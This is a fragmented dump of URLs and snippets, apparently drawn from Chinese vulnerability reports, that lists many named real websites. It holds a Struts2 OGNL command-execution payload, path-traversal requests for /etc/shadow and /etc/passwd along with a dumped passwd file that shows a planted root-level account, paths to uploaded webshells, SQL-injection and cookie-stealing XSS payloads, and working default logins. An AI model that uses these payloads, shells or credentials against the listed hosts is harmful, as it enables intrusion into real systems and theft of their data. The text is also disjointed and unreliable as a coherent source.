http://search.szfw.org/entry.php?action=getUserinfo2&userId=2-1 http://search.szfw.org/entry.php?action=getUserinfo2&userId=2 http://search.szfw.org/entry.php?action=getPwdpage可用于修改其密码。 http://search.szfw.org/entry.php?action=getUserinfo2&userId=2 http://suanming.kaiyun.china.com http://ued.sina.com.cn/ http://udc.weibo.com http://mux.baidu.com/ http://ued.baidu.com http://ued.focus.cn/ http://blog.19ued.com/ http://www.aliued.com/ http://www.aliued.com/?author=1 http://www.aliued.com/wp-login.php http://112.124.3.235:88/zte/index!loginout.action http://t.nextsns.com http://www.yst.com.cn/app/yst_index.action http://www.111g.com/?ct=news&ac=info&id=54617 http://www.111g.com/admin/ localhost:scan http://cbvideo.chinese.cn/index.action http://61.50.156.38/ http://www.aliued.com/panda/ http://www.aliued.com/panda/?author=1 http://www.aliued.com/panda/?author=100 http://www.aliued.com/panda/wp-login.php http://zhi.etao.com/wp-login.php http://w5cdn.ranktv.cn/dotnet/20130418/ueditor/ubb.min.js http://www.multibuy.cn/index.php?act=member_snsfriend&op=find http://www.xxx.com/home.php?mod=spacecp&ac=favorite&type=forum&id=2&handlekey=favoriteforum&infloat=yes&handlekey=a_favorite&inajax=1&ajaxtarget=fwin_content_a_favorite http://www.cswater.gov.cn/house/web.php?username=admin http://www.nh-fda.gov.cn/CmsEditor/Admin_Login.asp www.familydoctor.com.cn http://ask.familydoctor.com.cn/upimg.aspx http://ask.familydoctor.com.cn/UploadFile/TopicImg/20130928/0928095805104.aspx http://univ.zte.com.cn/ZteTrain/CustomerTrain/InviteLetter.aspx?pid=DTSH2010101001TCPR10&classid=11NURRC201 http://www.hunanzhuzhou.gov.cn/comm/common/appendix/20130928060539179.jsp http://www.xysvb.com/ http://www.xysvb.com/plus/90sec.php http://z.xywy.com/index.php?a=interviewReply&limit=6/*!50056aaaa*/ http://z.xywy.com/index.php?a=interviewReply&limit=6/*!50086aaaa*/ http://z.xywy.com/index.php?a=interviewReply&limit=6/*!50092aaaa*/ http://z.xywy.com/index.php?a=interviewReply&limit=6/*!50093aaaa*/ http://www.hdzj.gov.cn/read_news.php?id=648 http://web.jlnu.edu.cn/50jlnu/foundation/display.php?id=23 http://www.hnxfw.gov.cn/news_text.php?id=11550 http://tech.hebei.com.cn/pd/product/quitmarket.do http://www.lilifan.com//shop/index_new!ajaxCheck.action http://wenxue.xzjw.gov.cn/admin/ http://10w.u17.com/ http://www.soso.com/q?pid=s.idx&cid=s.idx.se&w=intitle%3A%BE%C6%B5%EA%B6%A9%B5%A5%CF%EA%C7%E9 http://www.soso.com/q?sc=web&bs=intitle%3A%BE%C6%B5%EA%B6%A9%B5%A5%CF%EA%C7%E9&ch=w.uf&num=10&w=intitle%3A%BE%C6%B5%EA%B6%A9%B5%A5%CF%EA%C7%E9+site%3Ahotels.ctrip.com site:hotels.ctrip.com http://land.tcl.com http://land.tcl.com:80/Default.aspx http://www.hnsyczj.gov.cn/comm/common/appendix/20130928050554437.jsp http://112.124.3.106:8080/ http://book.cnxianzai.com/search.php?searchType=3&keyword=%B3%A4%BD%AD%CE%C4%D2%D5 http://trip.gansudaily.com.cn/hotel/HotSceneryAjax.asp?p1=ShangHai&p2=ShangHai&p3=BaiYunGuan&page=1 http://mms.hb.vnet.cn:8088/sp/getlistapp.do http://www0.ceair.com/muecard/sales/b2c/QueryAction.do?method=doView&id=201004301010460672 http://www.hnwstj.com/ http://www.hnwstj.com/downloadfile.asp?id=70 inurl:lmsv5/login!loginIndexPage.action http://58.214.233.113:8800/lmsv5/login!loginIndexPage.action http://60.216.4.162:9091/lmsv5/login!loginIndexPage.action http://139.210.99.46:8080/lmsv5/login!loginIndexPage.action http://brio.tcl.com.cn/data/ http://brio.tcl.com.cn:80/data/ http://search.sh.ct10000.com/cpn/sys/list.action http://www.rc.gov.cn/comm/common/appendix/20130928052022909.jsp http://ego.tcl.com.cn/DRP/ http://ego.tcl.com.cn/DRP/login.action存在最新的ST2漏洞导致getshell。 http://ego.tcl.com.cn/DRP/shell.jsp http://rc.gpt.gov.cn/ http://rc.gpt.gov.cn/system_dntb/upload/temp_1.cdx;1..jpg http://rc.gpt.gov.cn/system_dntb/upload/temp_temp_b.cdx;1..jpg http://rc.gpt.gov.cn/system_dntb/temp_a.cdx;1..jpg http://www.fangxian.gov.cn/user/login.aspx http://dzjc.zhengzhou.gov.cn/indexAction.action root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin zabbix:x:100:101:Zabbix System:/var/lib/zabbix:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin ais:x:39:39:openais Framework:/:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false apache:x:48:48:Apache:/var/www:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash quagga:x:92:92:Quagga suite:/var/run/quagga:/sbin/nologin postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin hacluster:x:511:90::/home/hacluster:/bin/bash mailman:x:41:41:GNU Manager:/usr/lib/mailman:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin privoxy:x:73:73::/etc/privoxy:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin radvd:x:75:75:radvd user:/:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash postfix:x:89:89::/var/spool/postfix:/sbin/nologin dbmail:x:101:102:DBMail Account:/var/lib/dbmail:/sbin/nologin cyrus:x:76:12:Cyrus Server:/var/lib/imap:/bin/bash ident:x:98:98::/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin radiusd:x:95:95:radiusd user:/home/radiusd:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin bingdao:x:0:0::/home/bingdao:/bin/bash http://yzu.pigai.org/public/themes/classic/.svn/entries http://yzu.pigai.org/.svn/entries http://svn.jukuu.com:6666/svn/yzu.pigai.org/public/themes/classic site:learning.ceair.com http://www.jukuu.com/help.php http://99inn.cc/PerVip.aspx?tid=1 http://tvs.tcl.com/main/Login.aspx http://hq.gdgs.gov.cn:6888/admin/protected/index.jsp http://www.semirbiz.com/cn/career/campus-recruitment-semir-list.aspx?cityid=10 http://v.qq.com/p/tv/zt/ywaq/index.html http://www.qq.com/coral/coralCommentDome.htm http://union.ceair.com/Login.aspx http://www.csmap.gov.cn/iportal/iportalIndex.action http://www.mapjs.com.cn/indexopen.action http://zbgtj.gov.cn/iportal/iportalIndex.action http://www.shanghai-map.net:8080/shmap/randimg2.action http://www.xzmap.gov.cn/indexopen.action http://wx.233.com/Search/school/ddkde233Dexffdbvddfd11/aaammmdddffggddk/ddf3233dfdooqnmb.asp http://biz.finance.sina.com.cn/search/product/detail_card.php?id=2 http://www.yqkq.gov.cn/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx http://art.dahe.cn/mingjia/roomview.php?id=30 http://shequ.szsi.gov.cn:9080/CommunityWeb/login.jsp http://125.39.193.241:8080/admin.action?s=login http://www.ciqpt.gov.cn/admin/uploadfile.asp http://www.ciqpt.gov.cn/uploadfiles/201310/20131011519745.asp http://cts.tcl.com http://cts.tcl.com http://oa.yhjs.gov.cn/wssl/upload.jsp http://oa.yhjs.gov.cn/wssl/wssl.jsp http://oa.yhjs.gov.cn/wssl/upload/201308202217427770642804940000000001/silicl.jsp http://game.jinti.com/ https://vpn.catr.cn http://yzpf.gov.cn/system_dntb/uploadimg.aspx http://yzpf.gov.cn/system_dntb/upload/eWebErditor.asp;1.jpg?gl=file http://www.xhgtj.gov.cn/system_dntb/uploadimg.aspx http://www.xhgtj.gov.cn/system_dntb/upload/a.asa;1.jpg http://www.xt-safety.gov.cn/system_dntb/uploadimg.aspx http://www.xt-safety.gov.cn/system_dntb/upload/za.asp;1.jpg http://www.dwxcb.gov.cn/system_dntb/uploadimg.aspx http://www.dwxcb.gov.cn/system_dntb/upload/a.asa;1.jpg http://xxx.gov.cn/system_dntb/uploadimg.aspx http://www.dedecms.com/images/swfupload/swfupload.swf https://nealpoole.com/blog/2012/05/xss-and-csrf-via-swf-applets-swfupload-plupload/ http://www.dedecms.com/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// http://bbs.ztems.com/.svn/entries http://www.zhongxingfans.com/ http://www.zhongxingfans.com/robots.txt/1.php http://www.zhongxingfans.com/data/attachment/group/00/group_610_banner.jpg/1.php一句话马。 http://ssqj.qiye.ikanshu.cn/ ctrip.csdn.net/.svn/entries http://bbs.qrobot.qq.com http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf http://cwgk.taoyuan.gov.cn/user/login.aspx http://www.jxxzfgj.gov.cn/user/login.aspx trswcm:UploadService www.catr.cn SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/ xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/ xmlns:xsd="http://www.w3.org/1999/XMLSchema xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance xmlns:m0="http://tempuri.org/ xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/ xmlns:urn="http://www.catr.cn/wcm/services/trswcm:UploadService SOAP-ENV:Header/ SOAP-ENV:Body SOAP-ENV:Body http://www.catr.cn/zhaopin_society/regist.action http://zaozhuang.cyberpolice.cn:8080/admin_main.asp http://www.jiaxing.cyberpolice.cn/manage/ http://www.zhoushan.cyberpolice.cn/manage/index.jsp http://huhehaote.cyberpolice.cn/test.txt http://an.cyberpolice.cn http://202.100.246.16/netalarm/auth/login!loginFail.action whoami:fenghuoroot http://122.225.18.142/reg/reguser!register2Input.do position:absolute;width:100%;height:300%;background-color vertical-align:top http://wh.bbs.house.sina.com.cn/5790475176307092475/thread.html http://www.lysgzcx.hnloudi.gov.cn/GuestBook/yjjy.asp?ID=2330 http://www.jxweisheng.gov.cn/gw1/admin.asp http://www.jxweisheng.gov.cn/gw1/admin.asp http://bsfw.hebds.gov.cn/wbcms/ls/lsAction.do dir:/oracle/middleware/user_projects/domains/bsfw_domain/applications/wbcms dir:/oracle/middleware/user_projects/domains/bsfw_domain/applications/wbcms http://ndj.gdwater.gov.cn/Login.aspx http://www.ahpost.com.cn/com/viewnews.php?newsid=6578 http://www.onefoundation.cn/bbs.zip f.xunlei.com/.svn/entries http://pim.lenovo.com http://pim.lenovo.com/contact/portal/index.html http://pim.lenovo.com/contact/contact/portal/create/contact http://crm.tcl.com.cn/DRP/login.action shell:http://crm.tcl.com.cn/DRP/shell.jsp http://www.nxxy.gov.cn:81/manage/index.asp http://www.nxxy.gov.cn:81/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/fckeditor/editor/filemanager/connectors/asp/connector.asp&From=inner&value= http://www.chinafoodsltd.com:8080/IR/noticeDetail.jsp?ID=310 http://pan.suning.com http://www.xf9999.com/ http://3w.rayli.com.cn/countpage/countpage.aspx?pag http://down.rayli.com.cn/emag/rayli_shang086.rar www.wip.wealink.com www.wip.wealink.com www.wip.wealink.com www.wip.wealink.com www.wip.wealink.com www.wip.wealink.com www.wip.wealink.com www.wip.wealink.com www.wip.wealink.com www.wip.wealink.com include:spf.mail.qq.com www.wip.wealink.com www.wip.wealink.com www.wip.wealink.com www.wip.wealink.com www.wip.wealink.com include:mail.71inc.co include:222.66.48.26 www.wip.wealink.com include:spf.mail.qq.com www.wip.wealink.com www.wip.wealink.com www.wip.wealink.com http://a.xunlei.com)由于管理疏忽,导致.svn/entries等泄露重要数据,包括用户名、SQL数据可直接下载(明文显示)!剩下的就不再继续渗透了,估计情况要比我想像的复杂!!!国庆期间,网络安全更不容忽视! http://wcm.moc.gov.cn:9000/wcm/,漏洞详情参见 http://lxj.ecare365.com/HelpDetail.php?id=60000139 http://lexue.lenovo.com.cn/lms/pages//login.htm http://zhi.lenovo.com.cn/fy12pk/arena/arena_login.php http://zhi.lenovo.com.cn/fy12pk/pk_login.php?url=Z2FtZS8% http://lelink.ecare365.com/manage/ http://dyxyedu.net/index.php/News/detail?id=31 http://www.97zh.com/?ct=product&do=do http://www.97zh.com/?ct=product&goods_id=134 http://www.97zh.com/admin/index.php http://211.100.40.155/website/applyCollectWebsite.action http://z.yy.com/zone/square.do http://222.66.202.21/ http://m.coolmart.net.cn/ http://www.masrcb.com/masrcb.rar http://bbs.siteserver.cn/bbs.rar http://www.189180.net/ComIndex/Register http://elckj.gov.cn/syWebEditor/UpImg.asp http://www.ahqybb.gov.cn/syWebEditor/UpImg.asp http://service.zj.chinamobile.com/service.zip http://www.10086.cn/support/focus/suggest/index.htm http://bj.dm.wo.com.cn/ http://bj.dm.wo.com.cn/Aset2/androidblue/home/Home.action http://222.68.185.242:7080/mobileWT2/jwificheck.do http://beian.usernet.com.cn/user/gotoLoginPage.action http://beian.e-icann.com/user/gotoLoginPage.action http://beian.idcs.cn/user/gotoLoginPage.action http://beian.ccme.cc/user/gotoLoginPage.action http://beian.east.net/user/gotoLoginPage.action baidu:gotoLoginPage.action http://www.dh365.gov.cn/navi/dh/index.action http://www.ahnx.cn/console/login/LoginForm.jsp,通用的默认用户admin,默认口令12345678 http://www.crssg.com/qyglshow.php?list=834 http://mz.5see.com/Search.aspx?key= http://mm.5see.com/Search.aspx?key= http://cadmin.aqgj.cn cadmin.aqgj.cn/.svn/entries http://www.hbxz.gov.cn/common/common_info.action?wid=201211271614571107 http://live4.sports.tom.com/ live4.sports.tom.com/.svn/entries http://live4.sports.tom.com/Admin_Cron.html http://www.6173.com/ http://www.6173.com/index.php?s=/Index/artice/id/293 http://oa.6199.com/admin/fckeditor/editor/filemanager/connectors/test.html http://oa.6199.com//uplode/image/2.gif/.php http://edu.533.com/uploads/userup/393/3930F01010P0000P16.gif/.php http://search.kanglu.com/images/Klogo.jpg/.php www.miduo360.com http://www.fengyunzhibo.com/admin/feedback/copyrightFeedback.jsp http://www.fengyunzhibo.com/admin/feedback/copyrightFeedback.jsp直接进来。。 http://www.wooyun.org/bugs/wooyun-2013-038867/trace/4364ee6cc9e3c4285edfd302f4b6d54d position:absolute;width:100%;height:300%;background-color vertical-align:top http://bbs.qrobot.qq.com/thread-15495-2-1.html http://qzs.qq.com/snsapp/app/bee/widget/jump.htm?url=http://tk3333.com/ http://qzs.qq.com/snsapp/app/bee/widget/jump.htm?url=http://t.cn/SJHfpK http://jzcs.cdnhost.cn/news/html/?'5560.html https://www.trustcenter.de/RetailStore/jil/ChooseProduct!input.action http://reg.eset.com.cn/info.php http://reg.eset.com.cn/phpinfo.php http://sample.eset.com.cn/phpinfo.php http://nod32v2actsrv.eset.com.cn/www/i.php http://nod32v2actsrv.eset.com.cn/v1/i.php http://verify.eset.com.cn/inf.php http://faq.eset.com.cn/editor/filemanager/connectors/test.html http://www.eset.com.cn//uploadfile/2013/0607/1.txt http://eoffice8.weaver.cn:8028/login.php http://eoffice8.weaver.cn:8028/inc/attach.php?OP=1&ATTACHMENT_NAME=index.php&ATTACHMENT_ID=5402024843 http://www.showmycode.com/中可以解密) http://eoffice8.weaver.cn:8028/inc/attach.php?OP=1&ATTACHMENT_NAME=../../inc/oa_config.php&ATTACHMENT_ID=5402024843 http://eoffice8.weaver.cn:8028/inc/attach.php?OP=1&ATTACHMENT_NAME=../../mysql_config.ini&ATTACHMENT_ID=5402024843 http://eoffice8.weaver.cn:8028/attachment/2506423447/conf1g.php4 site:gov.cn filetype:xls http://www.ydh.cc/s/ http://www.dfyb.com.cn/newcenter/NewsCenter_List.asp?newsclass=3 http://www.dfyb.com.cn/newcenter/NewsCenter_List.asp?newsclass=2 http://www.dfyb.com.cn/sales/ProductPhoto.asp?productid=21 http://www.baidu.com/search/ressafe.html?q=%E7%99%BE%E5%BA%A6%E6%9F%90%E4%B8%80%E5%85%B3%E9%94%AE%E5%AD%97&ms=3&url=http://baike.baidu.com@google.com ftp://wfxcdj.gov.cn/ http://lms.9first.com/apply.asp?type=xz_apply http://www.8hy.cn:80/job_end.php?id=54 http://e-learning.lenovo.com.cn/newplayer/play/courseware_id/371 e-learning.lenovo.com.cn/newplayer/play/courseware_id/371* https://60.13.8.2//DownloadServlet?fileName=../../etc/shadow http://61.168.74.105//DownloadServlet?fileName=../../etc/shadow http://lovestep.onefoundation.cn:80/ http://www.zaojiao.com/ketang/content.php?cid=384 http://www.xuancheng.gov.cn/active/askview.php?id=67 http://183.62.214.230/StorageModel/login.action http://comm.dangdang.com/member/myfirst.php?displayid=6164454789111http://www.wooyun.org/bug/submit http://tuan.mangocity.com/product/productList.aspx?city=%E4%B8%8A%E6%B5%B7 http://www.zcf.org.cn/admin/main.htm http://gis.huizhou.gov.cn/user_registitem.action http://xzzf.gzjjjc.gov.cn:8081/dsrcy/dsrcy_dsrts.action http://slcredit.dg.gov.cn/credit/detail.action file:///mnt/sdcard/hehe.html。向天天浏览器发送请求要求打开一个页面时,即可触发 www.ccindex.cn http://www.ccindex.cn/speed/ http://club.tech.sina.com.cn position:absolute;width:100%;height:300%;background-color vertical-align:top http://124.75.29.169:8080/iptvnm/stb/update.action http://health.gzmed.gov.cn/rhin_portal/onlineAppeal.action http://service.szgas.com.cn/Guide/GuideDetail.aspx?module=4213&id=238 http://220.181.153.209:8080/manage/login.action http://220.181.153.191:8080/thirdparty/view/homepage.action http://220.181.153.192:8080/thirdparty/view/homepage.action http://220.181.153.193:8080/thirdparty/view/homepage.action http://zhibonet.com/iptv2/view/familyChannelList.action http://202.98.157.128/login/login.jsp http://club.ent.sina.com.cn/ position:absolute;width:100%;height:300%;background-color vertical-align:top http://www.sfc.sinopec.com/news/show.aspx?ID=2808013160015284680 http://mail.dnion.com/login.php?Cmd=login http://search.shouji.baofeng.com/sort.php http://search.shouji.baofeng.com/ls_columns.php?platf=android http://search.shouji.baofeng.com/client_settings.php?platf=android http://www.weidingtech.com/Soft.asp?ArticleID=5产品线 http://www.weidingtech.com/Works.asp?ClassID=15产品应用范围 inurl:rontmaintain/index.action http://www.gxzzy.cn/rontmaintain/index.action http://www.xingtiancar.com/rontmaintain/index.action http://www.4006066813.com/rontmaintain/index.action http://121.8.254.235:8070/qy_gczlaqgl/toLogin.action http://221.192.235.106:8080/jdxt_hbs/toLogin.action http://211.147.244.201:8000/gzjdxtoa/toLogin.action http://zjxt.zjcic.net:8080/JD_GuangDongZhanJiang/toLogin.action http://kfqzjz.gdd.gov.cn:8000/jdxt_kfq/toLogin.action http://www.ncjszj.com:8005/ncs_help/toLogin.action http://www.3hmis.com/server/2012-05-15/2332.html http://115.182.94.162:8080/resin-admin/ http://115.182.94.163:8080/resin-admin/ admin:admin http://pkg-repo.oss.letv.com/ http://117.121.58.26:8080 http://117.121.58.25:8080 http://115.182.94.163:8080 http://115.182.94.162:8080 http://115.182.94.163:8080/resin-admin http://www.sdta.cn/dtss/WEB-INF/ http://eservice.hxlife.com/logout.action http://www.hxlife.com/hxrs/zhaopinSearch.action http://220.181.35.173:8080/uploadMonitor/uploadTask.do http://www.zhenjiang.gov.cn/wcm/WCMV6/login.jsp http://g.51cto.com/group_index.php?do=bbsedit&tid=248203&sid=248203&gname=job&actions=edit&page=1 http://www.cucpay.com/front/business!detail.action http://www.51zxw.net/memberList.aspx http://www.51zxw.net/p_list_js_fl.asp?id=23 https://sp.pkufi.com/admin jdbc:microsoft:sqlserver://192.168.101.35:1433;DatabaseName=EMAP http://www.wenben114.com/ReadArt.asp?ArtID=776 http://www.wenben114.com/ReadArt.asp?ArtID=776 http://114.112.70.71/gotologin.box www.lqedu.com.cn http://www.duoc.cn/admin/直接登录 http://ghj.weifang.gov.cn/ShowInfoList.aspx?url_pid=156&cateid=183 http://ghj.weifang.gov.cn/ShowInfoList.aspx?url_pid=156&cateid=183 www.it http://m.jobui.com/trends?cityKw=%E9%9A%8F%E5%B7%9E http://jobui.com/?cityKw=%E6%AD%A6%E6%B1%89 http://jobui.com/trends?jobKw=88952634&cityKw=%E6%AD%A6%E6%B1%89 http://www.jobui.com/?cityKw=%E4%B8%8A%E6%B5%B7 http://m.jobui.com/trends?cityKw=%E9%9A%8F%E5%B7%9E http://m.jobui.com/?cityKw=%E5%8C%97%E4%BA%AC http://m.jobui.com/changecity/city.php?code=170000 http://m.jobui.com/changecity/city.php?code=170000 http://sc.5173.com/.svn/entries https://dns.norton.com/dnsweb/huConfigurePc.do?redirect:${%23s%3dnew%20java.util.ArrayList%28%29,%23x%3dnew%20java.lang.String%28%22cat%22%29,%23xx%3dnew%20java.lang.String%28%22/etc/passwd%22%29,%23s.add%28%23x%29,%23s.add%28%23xx%29,%23a%3dnew%20java.lang.ProcessBuilder%28%23s%29.start%28%29.getInputStream%28%29,%23b%3dnew%20java.io.InputStreamReader%28%23a%29,%23c%3dnew%20java.io.BufferedReader%28%23b%29,%23d%3dnew%20char[51020],%23c.read%28%23d%29,%23dddddd%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23dddddd.println%28%23d%29,%23dddddd.close%28%29 http://pro.baidu.com/blog/article/282.html https://ebusiness.pkufi.com/about/default.aspx?ID=24 http://ebusiness.pkufi.com/service/faq.aspx?ID=996&Tag=4 https://ebusiness.pkufi.com/service/faq.aspx?ID=996 https://ebusiness.pkufi.com/service/info.aspx?ID=995&DownID=17 http://ebusiness.pkufi.com/service/info.aspx?ID=995 http://www.now.cn/callcenter/.svn/entries svn://localhost/svn/nowcn-callcenter/tag/current/tmis/callcenter svn://localhost/svn/nowcn-callcenter http://enkj.com/include/upfile_head_img_src.asp?formname=form1&editname=head_img_src&uppath=UploadFiles&filelx=jpg|jpeg http://enkj.com/include/upfile_head_img_src.asp?formname=form1&editname=head_img_src&uppath=UploadFiles&filelx=jpg|asp http://enkj.com/UploadFiles/sb1.asp http://www.easyhadoop.com/ http://www.vistastory.com/phpmyadmin/index.php http://rsks.jshrss.gov.cn/jshr/search/toLoadZyjsrySearch.action http://www.avira.com/ http://3g.gfan.com/.svn/entries http://115.182.94.99:9000 http://115.182.94.67:9000 user:user user:user可以跳转到/mainMenu.shtml http://220.181.153.108/sysworkflow/zh-CN/uxmodern/main admin:admin http://broadcast.admin.itv.letv.com test:test http://hangye.letv.com test:test http://www.guoxuwang.cn/.svn/entries https://cp.guoxuwang.cn/.svn/entries https://svn.guoxuwang.com/svn/gxw-domain/trunk/web/WebRoot https://svn.guoxuwang.com/svn/gxw-domain http://124.127.255.10:8080/ http://demo.acsoft.com.cn/,类似使用7.0的网站同此 http://www.gps.org.cn/gps.rar http://dev.one-foundation.com/ http://dev.one-foundation.com/WebAdmin/config.php.gz http://dev.one-foundation.com/TENPAY/jump.php.gz http://dev.one-foundation.com/TENPAY/jump2.php.gz http://dev.one-foundation.com/WebAdmin/admincp.php.gz http://dev.one-foundation.com/WebAdmin/index.php.gz http://demo.51able.com/ http://220.181.153.157 admin:123456, admin1:123456,登录成功 admin2:123456 admin3:123456登录成功 http://www.qujiang.gov.cn/website/porta/QJPortalAction!secondIndex.action http://124.127.255.45/lenovo/ http://124.127.255.45/ZmptY2NtYW5hZ2Vy/ http://124.127.255.45/css http://124.127.255.45/images/.svn/text-base/ http://124.127.255.45/tools/ http://124.127.255.45/lenovo/js/ http://m.mail.qq.com/ http://w.mail.qq.com/ content://com.htc.calendar/../../../../../即可访问到根目录下的可以对外访问的所有文件。 http://99bill.com/fiquery/customorder/managecustomorder.htm?payto=xxx http://jiaoyuhuodong.pkufi.com/ http://jiaoyuhuodong.pkufi.com/activity_report_detail.php?id=3 http://uidc.cndns.com/wp-login.php?loggedout=true http://www.ldyx.org/phpmyadmin/ http://103.22.252.251/ http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/*%00.jpg http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/passwd%00.jpg http://103.22.252.251/smenu.php?menu=../../../../../../../../../../proc/version%00.jpg http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth0%00.jpg http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1%00.jpg http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-bond0%00.jpg http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/services%00.jpg http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/my.cnf%00.jpg http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/hosts%00.jpg http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/sysctl.conf%00.jpg http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/libuser.conf%00.jpg http://www.guoxuwang.cn/servlet/checkServlet.do?id=19 http://www.guoxuwang.cn:8700/servlet/checkServlet.do?id=19 http://inside.climate.sh.cn/ bt:/pentest/database/sqlmap# http://inside.climate.sh.cn/check.aspx http://www.yxaia.com/admin/Admin_login.asp http://yiqi11a37.site4.sitestar.cn/yiqi11a37/wwwroot/index.php?_m=mod_article&_a=fullist&caa_id=12 http://yiqi11a37.site4.sitestar.cn/yiqi11a37/wwwroot/admin/ http://202.96.202.186 www.zhujiwu.com http://gdkh.gtja.com/detail.php?aid=62 http://60.28.205.38:8080/ur/showStatic.jsp http://www.jitaihotel.com/Serach.aspx?searchText=%e4%bf%83%e9%94%80 http://www.exploit-db.com/exploits/28713/ http://wsyy.gzmz.gov.cn:9080/status?full=true http://www.tzsb.gov.cn:7001/status?full=true http://218.58.70.220/ http://218.58.70.220/main.asp http://218.58.70.220/SupplyInfoAddB.asp?ID=97 http://218.58.70.220/GG_View.asp?GGTy=%D7%EE%BD%FC%B9%AB%B8%E6&Top=10 http://218.58.70.220/SupplyInfoAddB.asp?ID=97 http://www.niteizechina.cn/products.php?id=20 http://www.sansui-cn.com/products.php?id=21 http://wenda60.com/admin_hiall_wenda/index.php?c=home&a=login http://wenda60.com/admin_hiall_wenda/index.php?c=statistics&a=tests_export&tid=128 http://www.joiest.com/ http://www.jdoou.com/users/center.jhtml http://www.haiercrm.com/acceptcatdata/index.jsp http://www.mytaoyuan.com/ http://photo.1disk.cn/homeapply.aspx?GetName=1 www.pigai.org/index.php?c=teacher&a=dumpinfo&st=3&do=edit&eid=845954 http://travel.haier.com/travel/Hotel/SPHotelInfo/ReLogin.aspx http://union.wap.58.com:8080/ http://weigou.baidu.com/service/user/order/view?order_id=1029679&package_id=1038393 http://weigou.baidu.com/service/user/order/view?order_id=1029678&package_id=1038392 http://weigou.baidu.com/service/user/order/view?order_id=1029677&package_id=1038391 http://weigou.baidu.com/service/user/order/view?order_id=1029680&package_id=1038395 http://topic.19lou.com/.svn/entries http://mes.juneyaoair.com/mes/ http://salon.hexun.com/topicsearch.aspx http://www.sjzfgj.gov.cn/admin/admin.aspx http://220.181.153.197 http://old.zqdz.gov.cn/website/portal/DZPortalAction!secondIndex.action http://www.xhxzfw.cn/indexAction.action http://211.140.246.58:8080/indexAction.action http://219.142.122.236/lenovo/ http://219.142.122.236/ZmptY2NtYW5hZ2Vy/ http://219.142.122.236/ZmptY2NtYW5hZ2Vy/p4data/Rdata/Rfiles/help.jsp http://219.142.122.236/ZmptY2NtYW5hZ2Vy/p4data/Rdata/Rfiles/ http://219.142.122.236/css/.svn/ http://219.142.122.236/images/.svn/text-base/ http://jwfile.juneyaoair.com:88/Admin/Login.aspx http://union.vjia.com/ http://bulo.hujiang.com/home http://xclub.xtep.com/WebSiteManage/Order/OrderList.aspx?OrderStatus=0 http://xclub.xtep.com/welcom.aspx http://www.tclmobile.com.cn/ http://www.shanshuihotel.com/index.php?m=about&id=64 http://www.shanshuihotel.com/?m=activity&a=show&id=16 http://www.shanshuihotel.com/index.php?m=reservation&a=tjifo&resortId=26 http://www.shanshuihotel.com/index.php?m=activity&a=show&id=15 http://cetv.com/character/kristy/com1./kz10k.asp 